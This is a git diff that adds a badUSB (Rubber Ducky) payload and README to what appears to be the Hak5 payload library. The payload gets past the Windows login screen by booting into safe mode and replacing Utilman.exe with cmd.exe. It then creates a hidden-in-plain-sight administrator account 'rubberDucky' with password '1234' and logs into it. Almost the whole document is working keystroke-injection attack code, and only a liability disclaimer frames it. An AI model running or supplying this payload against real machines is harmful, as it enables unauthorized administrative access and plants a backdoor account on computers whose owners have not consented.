hak5 · TzurSoffer · Dec 28, 2024 · Dec 28, 2024 · Jan 2, 2025 · Jan 7, 2025
diff --git a/payloads/library/general/Break-Into-Windows/README.md b/payloads/library/general/Break-Into-Windows/README.md
@@ -0,0 +1,17 @@
+
+## Disclaimer
+
+This script is provided "as is" without any warranty of any kind, either express or implied. The use of this script is at your own risk. The author is not responsible for any damage or loss of data that may occur as a result of using this script. By using this script, you agree to these terms.
+
+## About:
+A badUSB script that gains full admin access to a windows machine from the login screen.
+
+### How it works:
+1. It boots into safe mode
+2. It opens a cmd from safe mode
+3. It changes the Utilman.exe to be a cmd.exe
+4. It boots back into windows
+5. It opens the help menu which has been replaced with a cmd instance
+6. It creates a new admin account named ```rubberDucky``` with the password ```1234```
+7. it Reboots again, to register the new account
+8. It logs into the new account
diff --git a/payloads/library/general/Break-Into-Windows/payload.txt b/payloads/library/general/Break-Into-Windows/payload.txt
@@ -0,0 +1,114 @@
+REM Title: Windows Password Bypass
+REM Author: Tzur Soffer
+REM Description: Break into Windows 10 + 11
+REM Target: Windows 10, Windows 10
+REM Props: Hak5, Darren Kitchen, Korben
+REM Version: 2.0
+REM Category: General
+
+REM get into safe mode
+STRING QQQQQQQQQ
+CTRL ALT DELETE
+DELAY 3000
+HOLD SHIFT
+TAB
+RELEASE SHIFT
+ENTER
+DELAY 100
+UP
+DELAY 200
+
+HOLD SHIFT
+DELAY 200
+HOLD SPACE
+DELAY 100
+RELEASE SPACE
+DELAY 100
+ENTER
+RELEASE SHIFT
+
+DELAY 60000
+REM ADD CMD to login page
+TAB
+DELAY 50
+TAB
+DELAY 50
+ENTER
+DELAY 1000
+TAB
+DELAY 50
+ENTER
+DELAY 1000
+TAB
+DELAY 50
+TAB
+DELAY 50
+ENTER
+DELAY 1000
+REM replace utilman.exe with cmd.exe
+
+REM Check each drive from C: to G: for Utilman.exe
+STRING @echo off
+ENTER
+STRING setlocal enabledelayedexpansion
+ENTER
+STRING for %d in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
+ENTER
+STRING     if exist %d:\Windows\System32\Utilman.exe (
+ENTER
+STRING         echo Utilman.exe found in drive %d:
+ENTER
+STRING         cd /d %d:\Windows\System32\
+ENTER
+STRING     )
+ENTER
+STRING )
+ENTER
+STRING copy Utilman.exe  Utilman2.exe
+ENTER
+STRING copy  cmd.exe  Utilman.exe /y
+ENTER
+
+STRING exit
+ENTER
+DELAY 1000
+ENTER
+DELAY 60000
+
+REM go into shell from login page
+STRING QQQQQQQQQ
+DELAY 3000
+HOLD SHIFT
+TAB
+DELAY 50
+TAB
+RELEASE SHIFT
+ENTER
+DELAY 1000
+
+REM create new admin acount
+STRING net user rubberDucky 1234 /add
+ENTER
+STRING net localgroup administrators rubberDucky /add
+ENTER
+STRING shutdown /l
+ENTER
+DELAY 10000
+
+REM login to new user
+STRING QQQQQQQQQ
+DELAY 3000
+HOLD SHIFT
+TAB
+DELAY 50
+TAB
+DELAY 50
+TAB
+DELAY 50
+TAB
+DELAY 50
+RELEASE SHIFT
+ENTER
+DELAY 500
+STRING 1234
+ENTER